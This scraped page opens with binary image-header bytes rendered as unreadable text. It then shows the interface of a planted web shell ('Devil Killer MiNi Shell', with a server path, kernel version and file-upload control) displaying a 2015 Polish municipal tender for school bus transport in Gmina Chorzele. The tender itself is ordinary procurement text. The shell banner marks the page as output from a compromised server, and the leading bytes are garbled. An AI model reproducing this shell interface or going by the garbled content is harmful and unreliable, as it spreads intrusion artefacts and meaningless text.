JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150707/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150707/168708-N-2015.html

<p class="kh_header"><b>Chorzele: Dowóz uczniów do szkół/przedszkola na terenie Gminy Chorzele w roku szkolnym 2015/2016 na podstawie zakupu biletów miesięcznych</b><br>
<b>Numer ogłoszenia: 168708 - 2015; data zamieszczenia: 07.07.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Chorzele , ul. Stanisława Komosińskiego 1, 06-330 Chorzele, woj. mazowieckie, tel. 29 7516540, faks 29 7516530.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.chorzele.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dowóz uczniów do szkół/przedszkola na terenie Gminy Chorzele w roku szkolnym 2015/2016 na podstawie zakupu biletów miesięcznych.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.1.Przedmiot zamówienia stanowi usługa obejmująca dowóz uczniów z miejsca ich zamieszkania do szkół/przedszkola na terenie Gminy Chorzele oraz odwóz uczniów ze szkół-przedszkola do miejsca zamieszkania wraz ze sprawowaniem opieki nad dziećmi w czasie ich przewozu, jak również w trakcie ich wsiadania i wysiadania z pojazdu w roku szkolnym 2015|2016 w dni nauki szkolnej przyjmując organizację roku szkolnego zgodnie z Rozporządzeniem Ministra Edukacji Narodowej i Sportu z dnia 18 kwietnia 2002 r. (Dz. U. Nr 46, poz. 432 ze zm.). Dowóz odbywał się będzie w godzinach umożliwiających przybycie uczniów do szkoły i przedszkola nie później niż 10 minut przed ustaloną godziną rozpoczęcia zajęć szkolnych-przedszkolnych i opuszczenie szkoły-przedszkola o ustalonej przez Zamawiającego godzinie. Wykonawca zobowiązuje się świadczyć usługi w oparciu o rozkład jazdy dla określonej trasy, sporządzony przez Wykonawcę do 28 sierpnia 2015 r. i zatwierdzony przez Dyrektorów szkół-przedszkola.
Świadczenie usług w zakresie dowozu i odwozu uczniów do i ze szkół-przedszkola na terenie Gminy Chorzele odbywać się będzie na podstawie ilości zakupionych biletów miesięcznych. Szacowana ilość biletów miesięcznych wynosi 526 sztuk. 
Z przewozów będą korzystać dzieci przedszkolne, uczniowie szkoły podstawowej oraz gimnazjum na podstawie biletów miesięcznych wydanych przez Wykonawcę na podstawie otrzymanych od Zamawiającego imiennych list uczniów uprawionych do dowozu. Kontrolę uprawnień przejazdu osób korzystających z przewozów umownych wykonuje opiekun. Dopuszcza się przejazdy osób, które nie są uprawnione do korzystania z bezpłatnego dowozu oraz sprzedaż im biletów. Opiekę podczas przewozu zapewnia Wykonawca. Zamawiający dopuszcza możliwość zmiany godziny dowozu i odwozu uczniów.
Wykonawca do dowozu uczniów do szkół ma wykorzystywać pojazdy dopuszczone do ruchu w zakresie przewozów pasażerskich i odpowiednio oznakowane. Podmiot, który będzie realizował przedmiot zamówienia będzie zobowiązany zabezpieczyć odpowiednią liczbę środków transportu z odpowiednią ilością miejsc siedzących dostosowaną do ilości dowożonych osób. Pojazdy służące do przewozu uczniów muszą być oznakowane, ubezpieczone oraz spełniać wymogi niezbędne do dopuszczenia do ruchu drogowego. Wykonawca będzie przestrzegał regularności i punktualności kursowania zgodnie z ustalonym harmonogramem przewozów.
Zadanie 1
1)Dowóz i odwóz uczniów do Przedszkola Samorządowego w Chorzelach, Publicznej Szkoły Podstawowej im. Marszałka Józefa Piłsudskiego w Chorzelach, Publicznego Gimnazjum im. Papieża Jana Pawła II w Chorzelach, Zespołu Szkół w Krzynowłodze Wielkiej:
a)18 dzieci do Przedszkola Samorządowego w Chorzelach,
b)115 uczniów do Publicznej Szkoły Podstawowej im. Marszałka Józefa Piłsudskiego w Chorzelach,
c)56 uczniów do  Publicznego Gimnazjum im. Papieża Jana Pawła II w Chorzelach,
d)90 uczniów do  Zespołu Szkół w Krzynowłodze Wielkiej.
Razem: 279 uczniów.
Trasa przejazdu:	
Zagaty - Chorzele - 3 bilety		
Grąd Rycicki - Chorzele - 3 bilety		
Przysowy - Chorzele - 11 biletów		
Brzeski Kołaki - Chorzele - 22 bilety 		
Raszujka - Chorzele - 14 biletów		
Budki - Chorzele - 31 biletów		
Opaleniec - Chorzele - 33 bilety		
Chorzele Kodon - Chorzele - 4 bilety		
Chorzele - Chorzele Stacja PKP - 9 biletów		
Bogdany Małe - Chorzele - 1 bilet		
Bogdany Wielkie - Chorzele - 7 biletów		
Bagienice - Chorzele - 17 biletów		
Bagienice Kolonia - Chorzele - 4 bilety		
Niskie Wielkie|Bobry - Chorzele - 4 bilety		
Przątalina - Chorzele - 4 bilety		
Rembielin - Chorzele - 22 bilety		
Kwiatkowo - Krzynowłoga Wielka - 5 biletów		
Lipowiec - Krzynowłaoga Wielka - 6 biletów
Rycice - Krzynowłoga Wielka - 28 biletów		
Czaplice Bąki - Krzynowłoga Wielka - 14 biletów		
Aleksandrowo - Krzynowłoga Wielka - 5 biletów		
Łazy - Krzynowłoga Wielka - 1 bilet		
Gadomiec Miłocięta - 16 biletów		
Gadomiec Trojany - Krzynowłoga Wielka -1 bilet		
Gadomiec Jebieńki - Krzynowłoga Wielka - 1 bilet		
Romany Karcze - Krzynowłoga Wielka - 3 bilety		
Romany Sędzięta - Krzynowłoga Wielka - 1 bilet		
Gadomiec Chrzczany - Krzynowłoga Wielka - 6 biletów		
Dąbrowa - Krzynowłoga Wielka - 3 bilety		
Razem biletów 279 sztuk.		
2) Dowóz do wyżej wymienionych szkół/przedszkola obejmuje następujące kursy:
a)Chorzele - Rembielin - Chorzele - 3 kursy dziennie o długości trasy jednego kursu wy-noszącej ok.6,6 km (bus),
b)Chorzele - Brzeski Kołaki - Przysowy - Grąd Rycicki - Zagaty - Chorzele - 3 kursy dziennie o długości trasy jednego kursu wynoszącej ok. 18,3 km (autobus),
c)Chorzele - Budki - Raszujka - Chorzele - 3 kursy dziennie o długości trasy jednego kursu wynoszącej ok. 17 km (autobus),
d)Chorzele - Opaleniec - Chorzele Kordon - Chorzele  - 3 kursy dziennie o długości trasy jednego kursu wynoszącej ok. 12,6 km (autobus),
e)Chorzele - Bogdany Małe - Bogdany Wielkie - Bagienice - Chorzele - 3 kursy dziennie o długości trasy jednego kursu wynoszącej ok. 12,2 km (autobus),
f)Chorzele - Stacja PKP Chorzele - Chorzele - 3 kursy dziennie o długości trasy jednego kursu wynoszącej ok. 11,5 km (bus),
g)Chorzele - Niskie Wielkie/Bobry - Bagienice Kolonia - Przątalina - Chorzele - 3 kursy dziennie o długości trasy jednego kursu wynoszącej ok. 12 km (bus), 
h)Krzynowłoga Wielka - Gadomiec Miłocięta - Gadomiec Chrzczany - Gadomiec Trojany - Gadomiec Jebieńki-Łazy -  Czaplice Bąki - Romany Sędzięta  - Romany Karcze - Krzynowłoga Wielka - 3 kursy dziennie o długości trasy jednego kursu wynoszącej ok. 23 km (autobus),  
i)Krzynowłoga Wielka - Kwiatkowo - Krzynowłoga Wielka - 1 kursy dziennie o długości trasy   wynoszącej ok. 16,4 km (bus) oraz 2 kursy dziennie o długości trasy jednego kursu wynoszącej ok.16,4 km (samochód osobowy),
j)Krzynowłoga Wielka - Lipowiec - Aleksandrowo - Rycice - Krzynowłoga Wielka - 3 kursy dziennie o długości trasy jednego kursu wynoszącej ok. 11,5 km (autobus).
Razem szacunkowa dzienna ilość kilometrów:
a)autobus: 283,8 km,
b)bus:  106,7 km
c)samochód osobowy:  32,8 km
Razem szacunkowa  miesięczna ilość kilometrów:
a)autobus: 283,8 km x 22 dni =  6243,6 km
b)bus:  106,7 x 22 dni =  2347,4 km
c)samochód osobowy:  32,8 km x 22 dni =  721,6 km
Razem szacunkowa 10 - miesięczna ilość kilometrów:
a)autobus:  6243,6 km x 10 miesięcy =  62436 km
b)bus: 2347,4 km samochód x 10 miesięcy =  23474 km
c)samochód - osobowy: 721,6 km x 10 miesięcy =  7216 km
Zadanie 2
3) Dowóz i odwóz uczniów do Publicznej Szkoły Podstawowej w Pościeniu Wsi, Publicznej Szkoły Podstawowej w Krukowie, Zespołu Szkół w Zarębach:
a) 31 uczniów do Publicznej Szkoły Podstawowej w Pościeniu Wsi,
b) 40 uczniów do  Publicznej Szkoły Podstawowej w Krukowie,
c) 176 uczniów do Zespołu Szkół w Zarębach.
Razem: 247 uczniów.
Trasa przejazdu:	
Raszujka - Poścień Wieś - 14 biletów		
Pruskołęka - Poścień Wieś - 12 biletów		
Poścień Zamion - Poścień Wieś - 5 biletów		
Binduga - Krukowo - 13 sztuk		
Rzodkiewnica - Krukowo - 12 biletów		
Rawki - Krukowo - 1 bilet		
Nowa Wieś Zarębska - Krukowo - 7 biletów		
Krukowo - Krukowo - 5 biletów		
Wierzchowizna - Krukowo - 2 bilety		
Binduga - Zaręby - 4 bilety		
Krukowo - Zaręby - 20 biletów		
Rzodkiewnica - Zaręby - 21 biletów		
Wierzchowizna - Zaręby - 4 bilety		
Poścień Wieś  - Zaręby - 6 biletów		
Poścień Zamion - Zaręby - 4 bilety		
Pruskołęka - Zaręby - 4 bilety		
Łaz - Zaręby - 41 biletów		
Mącice - Zaręby - 29 biletów		
Ścięciel - Zaręby - 4 bilety		
Nowa Wieś Zarębska - Zaręby - 10 biletów		
Rawki - Zaręby - 8 biletów		
Sosnówek - Zaręby - 1 bilet		
Zaręby Podrzecze - Zaręby - 4 bilety		
Zaręby Borek - Zaręby - 16 biletów		
Razem biletów 247 sztuk.	
4)Dowóz do wyżej wymienionych szkół obejmuje następujące kursy:
a)Zaręby - Łaz - Sosnówek - Zaręby Borek - Mącice - Zaręby - 2 kursy dziennie o długości trasy jednego kursu wynoszącej ok. 27,2 km (autobus),
b)Zaręby - Mącice - Zaręby - 1 kurs dziennie o długości trasy wynoszącej ok. 10,2 km (autobus),
c)Zaręby - Łaz - Sosnówek - Zaręby Borek - Zaręby - 1 kurs dziennie o długości trasy jednego kursu wynoszącej ok. 18 km (autobus),
d)Zaręby - Krukowo - Zaręby - 2 kursy dziennie o długości trasy jednego kursu wynoszącej ok. 10,2 km (autobus),
e)Zaręby - Ścięciel - Zaręby - 3 kursy dziennie o długości trasy jednego kursu wynoszącej ok.20,8 km (samochód osobowy), 
f)Zaręby - Zaręby Podrzecze - Zaręby - 2 kursy dziennie o długości trasy jednego kursu wynoszącej ok. 6,9 km (samochód osobowy),
g)Zaręby - Rawki - Wierzchowizna - Nowa Wieś Zarębska - Binduga - Rzodkiewnica - Zaręby - 2  kursy dziennie o długości trasy jednego kursu wynoszącej ok. 35,3 km (auto-bus),
h)Zaręby - Rzodkiewnica - Zaręby - 1 kurs dziennie o długości trasy jednego kursu wynoszącej ok. 21,6 km (autobus),
i)Zaręby - Rawki - Wierzchowizna - Nowa Wieś Zarębska - Binduga - Zaręby - 2 kursy dziennie o   długości trasy jednego kursu wynoszącej ok. 25 km (autobus),
j)Zaręby - Poścień Wieś Szkoła - Poścień Zamion - Pruskołęka - Raszujka -  Zaręby - 3 kursy dziennie o długości trasy jednego kursu wynoszącej ok. 31,7 (autobus),
k)Krukowo - Rzodkiewnica - Krukowo - 3 kursy dziennie o długości trasy jednego kursu wynoszącej ok. 11,4 km (bus),
l)Krukowo - Nowa Wieś Zarębska - Rawki - Binduga -  Krukowo - 3 kursy dziennie o dłu-gości trasy jednego kursu wynoszącej ok. 17 km (bus).
Razem dzienna ilość kilometrów:
a)autobus: 340,3km ,
b)bus: 84,8 km
c)samochód osobowy: 76,2 km
Razem miesięczna ilość kilometrów:
a)autobus: 340,3 km x 22 dni = 7486,6 km
b)bus:  84,8 km x 22 dni =  1865,6 km
c)samochód osobowy: 76,2 km x 22 dni = 1676,4 km
Razem 10 - miesięczna ilość kilometrów:
a)autobus: 7486,6 km x 10 miesięcy = 74866 km
b)bus: 1865,6 km x 10 miesięcy = 18 656 km
c)samochód osobowy: 1 676,4 x 10 miesięcy = 16 764 km
5.Zamawiający przewiduje możliwość zmiany ilości kursów, rodzaju pojazdu w poszczególnych zadaniach, jak również zmianę (w górę i dół) długości trasy jednego kursu, jeżeli wystąpią okoliczności uzasadniające potrzebę takiej zmiany. Do takich okoliczności Zamawiający w szczególności zalicza: zmianę godzin lekcyjnych, wypadki losowe uczniów  powodujące wydłużenie trasy kursu, zmniejszenie lub zwiększenie liczby uczniów dowożonych w ramach poszczególnych tras. 
6.Zapewnienie opieki nad dowożonymi uczniami należy do zadań Przewoźnika.
7.Dowóz należy zorganizować w godzinach od 7:00 do 8:00, odwóz natomiast w godzinach ustalonych w porozumieniu z dyrektorami szkół.
8.W ofercie należy podać stałą cenę (obowiązującą przez cały okres trwania umowy) za 1 bilet  miesięczny.
9.Cena za usługę dowozu to: cena brutto biletu miesięcznego dwustronnego (dowóz i odwóz) dla jednego ucznia na wyznaczonej trasie, która zawiera wszystkie koszty Wykonawcy..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 60.10.00.00-9, 60.13.00.00-8, 63.51.20.00-1.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.06.2016.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.Zamawiający wymaga wniesienia wadium.
Ustala się wadium:
a)dla zadania 1 przedmiotu zamówienia w wysokości: 5.000,00 zł, (słownie: pięć tysięcy złotych).
b)dla zadania 2 przedmiotu zamówienia w wysokości: 4.500,00 zł, (słownie: cztery tysiące pięćset złotych).
2.Wykonawca wnosi wadium w wybranej przez siebie, wymienionej poniżej, formie:
1)W pieniądzu, przelewem na rachunek bankowy: 
Bank Spółdzielczy w Chorzelach Nr 31 8913 0005 0000 1472 2000 0030 z adnotacją:
wadium - Dowóz uczniów do szkół/przedszkola na terenie Gminy Chorzele w roku szkolnym 2015-2016 na podstawie zakupu biletów miesięcznych - zadanie 1 lub 
wadium - Dowóz uczniów do szkół/przedszkola na terenie Gminy Chorzele w roku szkolnym 2015-2016 na podstawie zakupu biletów miesięcznych - zadanie 2.
2)W poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo- kredytowej, z tym że zobowiązanie kasy jest zobowiązaniem pieniężnym,
3)W gwarancjach bankowych, 
4)W gwarancjach ubezpieczeniowych,
5)W poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt. 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2007 r. Nr 42, poz. 275 ze zmianami),
6)Wadium wnoszone w formie poręczeń lub gwarancji musi być złożone w   oryginale i musi obejmować cały okres związania ofertą.
7)Wadium musi być wniesione przed upływem wyznaczonego terminu składania ofert tj. do dnia 16.07.2015r. do godz. 12.00.
8)Sposób przekazania: 
Oryginał dokumentu potwierdzającego wniesienie wadium w formach innych niż w pieniądzu należy złożyć w kasie Urzędu Miasta i Gminy w Chorzelach,  ul. Stanisława Komosińskiego 1, 06-330 Chorzele, pok. Nr 33, kopię dokumentu potwierdzającego wniesienie wadium należy dołączyć do oferty.
Jeżeli wadium wniesiono w pieniądzu, Wykonawca powinien załączyć do oferty do-wód wniesienia wadium na konto Zamawiającego.
Zamawiający dopuszcza, aby oryginał wadium został złożony w kopercie zawierającej ofertę (w osobnej kopercie nie zszyty z resztą oferty),  kopia wadium powinna zostać zszyta z resztą oferty.
9)Za termin wniesienia wadium w formie przelewu pieniężnego przyjmuje się termin uznania na rachunku Zamawiającego.
10)Dokumenty dotyczące wniesienia wadium w formach innych niż w pieniądzu należy złożyć w formie oryginału.
11)W zakresie wadium obowiązują uregulowania Prawa zamówień publicznych zawarte w art. 45 i 46.
12)W przypadku składania oferty przez Wykonawców występujących wspólnie (konsorcjum-spółka cywilna) wymagane wadium wnosi konsorcjum-spółka cywilna lub jeden z jej członków.
W przypadku niezabezpieczenia oferty jedną z określonych w niniejszej specyfikacji form wadium Wykonawca zostanie wykluczony z udziału w postępowaniu, a jego oferta będzie podlegać odrzuceniu.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie oceniony według kryterium: spełnia - nie spełnia. Warunek zostanie uznany za spełniony, jeżeli Wykonawca przedłoży ważną Licencję na wykonywanie krajowego transportu drogowego osób</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie oceniony według kryterium: spełnia - nie spełnia. Warunek zostanie spełniony, jeżeli Wykonawca złoży wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie. Wykonawca musi wykazać, że wykonał co najmniej 1 usługę polegającą na dowozie uczniów wraz z zapewnieniem  im opieki przez okres co najmniej jednego roku szkolnego na kwotę minimum: 
dla zadania 1:     200.000,00 zł brutto każda,
dla zadania 2:     180.000,00 zł brutto każda,
oraz załączyć dowody potwierdzające, że usługi te zostały wykonane należycie.  Pod pojęciem głównych usług Zamawiający rozumie prace polegające na dowozie uczniów wraz z zapewnieniem im opieki. Wykonawcy wspólnie ubiegający się o udzielenie niniejszego zamówienia mogą wykazać, że łącznie spełniają powyższy warunek</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie oceniony według kryterium: spełnia - nie spełnia.
Warunek uznany zostanie za spełniony jeżeli Wykonawca w Wykazie sprzętu dostępnego Wykonawcy do wykonania zamówienia wykaże, że dysponuje co najmniej:
na zadanie 1:
4 autobusami (2 autobusy po min. 40 miejsc siedzących, 1 autobus min.50 miejsc siedzących oraz 1 autobus zastępczy min. 50 miejsc siedzących), 2 busy po min. 15 miejsc siedzących i 1 samochód osobowy. 
na zadanie 2:   
4 autobusami (1 autobusy po min. 40 miejsc siedzących, 2 autobusy min.50 miejsc siedzących oraz 1 autobus zastępczy min. 50 miejsc siedzących), 1 bus min. 20 miejsc siedzących i 1 samochód osobowy.
Wszystkie ww. pojazdy muszą być dopuszczone do ruchu na terytorium RP (z ważnym badaniem technicznym)</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie oceniony według kryterium: spełnia - nie spełnia.
Wykonawca musi dysponować osobami zdolnymi do wykonania zamówienia, czyli kierowcami  z wymaganiami kwalifikacyjnymi do prowadzenia pojazdów (uprawnienia kategorii D, łącznie z badaniami psychologicznymi). W celu potwierdzenia spełniania niniejszego warunku Wykonawcy zobowiązani są przedłożyć wykaz osób, które będą uczestniczyć w wykonaniu zamówienia, zawierający ww. informacje, oraz potwierdzić je złożeniem oświadczenia, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia do wykonywania określonej działalności lub czynności</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie oceniony według kryterium: spełnia - nie spełnia. Warunek zostanie uznany za spełniony, jeżeli Wykonawca posiada ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej działalności i przedłoży opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia - na kwotę :
na zadanie 1: nie mniejszą niż  200.000,00 złotych,
na zadanie 2: nie mniejszą niż  180.000,00 złotych.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

